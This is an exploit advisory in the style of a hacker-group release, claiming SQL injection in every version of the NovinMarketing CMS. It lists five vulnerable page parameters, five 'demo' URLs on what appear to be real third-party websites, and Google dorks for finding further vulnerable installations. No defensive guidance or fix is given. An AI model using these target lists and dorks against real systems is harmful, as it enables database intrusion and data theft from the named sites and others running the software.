NovinMarketing suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
15c1aaf02f8436c4bf39a04892684e4871c635c336f4015e772a2c28904c7d6f
**************************************************************************************************
| @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ |
| @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ |
| @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ |
**************************************************************************************************
==================================================================================================
# [~] Exploit Title: NovinMarketing SQL Injection Bugs #
# [~] Google Dorks : " Bottom Of The Exploits " #
# [~] Date: 10/09/2012 (Mo) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : NovinMarketing.com #
==================================================================================================
# [+] SQLi Exploits : #
# http://WebSite.Com/[path]/ShowCourseAnnouncement.aspx?announceid=[SQLi] #
# http://WebSite.Com/[path]/AdsShow.aspx?adsid=[SQLi] #
# http://WebSite.Com/[path]/ProductShow.aspx?prodid=[SQLi] #
# http://WebSite.Com/[path]/ShowAnnouncement.aspx?announceid=[SQLi] #
# http://WebSite.Com/[path]/ShowNews.aspx?newsid=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Demos : #
# http://www.iedep.com/CMS_UI/ShowCourseAnnouncement.aspx?announceid=6 #
# http://peykedideno.com/FA/AdsShow.aspx?adsid=244 #
# http://www.bazarhotel.com/HotelProducts/CMS_UI/ProductShow.aspx?prodid=17 #
# http://jppars.com/CMS_UI/ShowAnnouncement.aspx?announceid=10 #
# http://www.tt-bita.com/CMS_UI/ShowNews.aspx?newsid=1026 #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# inurl:"ShowCourseAnnouncement.aspx?announceid=" #
# inurl:"AdsShow.aspx?adsid=[" #
# inurl:"ProductShow.aspx?prodid=" #
# inurl:"ShowAnnouncement.aspx?announceid=" #
# inurl:"ShowNews.aspx?newsid=" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================